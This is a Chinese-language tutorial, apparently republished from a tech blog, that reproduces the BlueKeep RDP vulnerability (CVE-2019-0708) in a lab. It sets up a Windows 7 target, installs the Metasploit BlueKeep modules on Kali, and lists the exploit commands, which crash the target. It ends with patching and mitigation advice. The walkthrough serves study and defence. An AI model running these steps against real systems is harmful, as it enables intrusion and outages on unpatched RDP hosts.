如何分析RDP终极EXP爆破漏洞CVE-2019-0708

本篇文章为大家展示了如何分析RDP终极EXP爆破漏洞CVE-2019-0708,内容简明扼要并且容易理解,绝对能使你眼前一亮,通过这篇文章的详细介绍希望你能有所收获。

0x00 漏洞概述

CVE-2019-0708是微软于2019年05月14日发布的一个严重的RDP远程代码执行漏洞。该漏洞无需身份认证和用户交互,可能形成蠕虫爆发,影响堪比wannycry。

2019年09月07日,@rapid7 在其metasploit-framework仓库公开发布了CVE-2019-0708的利用模块,漏洞利用工具已经开始扩散,已经构成了蠕虫级的攻击威胁。

0x01 影响版本

Windows 7

Windows Server 2008 R2

Windows Server 2008

Windows 2003

Windows XP

Windows 8和Windows 10及之后版本的用户不受此漏洞影响

0x02 漏洞原理

由于对象指针在释放后再次被使用而引发UAF漏洞,详情见

https://www.anquanke.com/post/id/181577

0x03 环境搭建

环境准备:

win7 sp1 – 192.168.152.139

Kali 2019.4 – 192.168.152.138

1.win7 sp1 准备:

开启3389:

打开控制面板,选择系统和安全,选择系统,点击远程设置,弹出系统属性,点击远程,在远程桌面上选择允许运行任意版本远程桌面的计算机连接(较不安全)。

如何分析RDP终极EXP爆破漏洞CVE-2019-0708

2.Win+r,输入cmd命令,输入netstat -ano查看端口状态,可以看道3389状态是listening。

如何分析RDP终极EXP爆破漏洞CVE-2019-0708

3.修改注册表:

Win + R 输入 regedit 进入注册表编辑器,按以下目录找到 fDisableCam 并将值改为0

HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Control

/TerminalServer/Winstations/RDP-Tcp/fDisableCam = 0

如何分析RDP终极EXP爆破漏洞CVE-2019-0708

4.打开kali :

Kali2019版本的要下载需要的文件

如何分析RDP终极EXP爆破漏洞CVE-2019-0708

可以看到有四个.rb后缀的文件,接下来将它们放至相应的目录(rdp目录需要自己创建)

rdp.rb /usr/share/metasploit-framework/lib/msf/core/exploit/rdp.rd

rdp_scanner.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb

cve_2019_0708_bluekeep.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb

cve_2019_0708_bluekeep_rce.rb /usr/share/metasploit-framework/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb

如何分析RDP终极EXP爆破漏洞CVE-2019-0708

5.查看文件是否复制成功

cd /usr/share/metasploit-framework/lib/msf/core/exploit/

如何分析RDP终极EXP爆破漏洞CVE-2019-0708

cd /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/

如何分析RDP终极EXP爆破漏洞CVE-2019-0708

cd /usr/share/metasploit-framework/modules/exploit/windows/rdp/

如何分析RDP终极EXP爆破漏洞CVE-2019-0708

0x04漏洞复现

1. 启动msf:

Msfconsole

2.重新加载所有模块(重要):

命令:reload_all

如何分析RDP终极EXP爆破漏洞CVE-2019-0708

3.搜索漏洞模块

search 2019_0708

如何分析RDP终极EXP爆破漏洞CVE-2019-0708

use exploit/windows/rdp/cve_2019_0708_bluekeep_rce //使用攻击模块

set rhosts 192.168.152.139 //设置目标主机(win7 sp1)

set rport 3389 //设置目标端口

set target 3

如何分析RDP终极EXP爆破漏洞CVE-2019-0708

4.Run 执行 win7 sp1蓝屏

如何分析RDP终极EXP爆破漏洞CVE-2019-0708

0x05 漏洞修复

1.及时打对应系统的安全补丁

2.关闭3389端口或添加防火墙安全策略限制对3389端口的访问

3.打不了补丁的可以开启远程桌面(网络级别身份验证(NLA)),可以临时防止漏洞攻击

上述内容就是如何分析RDP终极EXP爆破漏洞CVE-2019-0708,你们学到知识或技能了吗?如果还想学到更多技能或者丰富自己的知识储备,欢迎关注亿速云行业资讯频道。

原创文章,作者:kepupublish,如若转载,请注明出处:https://blog.ytso.com/220507.html

(0)
上一篇 2022年1月2日
下一篇 2022年1月2日

相关推荐

发表回复

登录后才能评论